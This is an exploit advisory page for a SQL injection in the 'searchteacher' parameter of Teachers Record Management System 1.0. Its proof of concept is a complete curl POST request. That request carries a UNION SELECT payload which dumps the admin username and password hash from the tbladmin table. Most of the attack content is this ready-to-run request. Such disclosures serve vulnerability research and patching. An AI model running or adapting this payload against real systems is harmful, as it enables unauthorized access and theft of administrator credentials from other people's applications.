Teachers Record Management System 1.0 searchteacher SQL Injection

2021.02.19
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Teachers Record Management System 1.0 - 'searchteacher' SQL Injection # Date: 13/02/2021 # Exploit Author: Soham Bakore, Nakul Ratti # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14399/teacher-record-system-phpmysql.html # Version:1.0 # Tested on: latest version of Chrome, Firefox on Windows and Linux --------------------------Proof of Concept----------------------- 1. Navigate to http://host/trms/ 2. The "searchteacher" parameter in search-teacher.php is vulnerable to SQL injection 3. Below curl request will display the admin username and password hash ------------------------Exploit request----------------------------- curl -i -s -k -X $'POST' \ -H $'Host: 192.168.1.13' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 130' -H $'Origin: http://192.168.1.17' -H $'DNT: 1' -H $'Connection: close' -H $'Referer: http://192.168.1.13/trms/' -H $'Cookie: PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' \ --data-binary $'searchteacher=Arts\'+union+select+1,concat(\'Username:\',UserName),3,concat(\'Password:\',Password),5,6,7,8,9,10+from+tbladmin#&search=' \ $'http://host/trms/search-teacher.php'


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top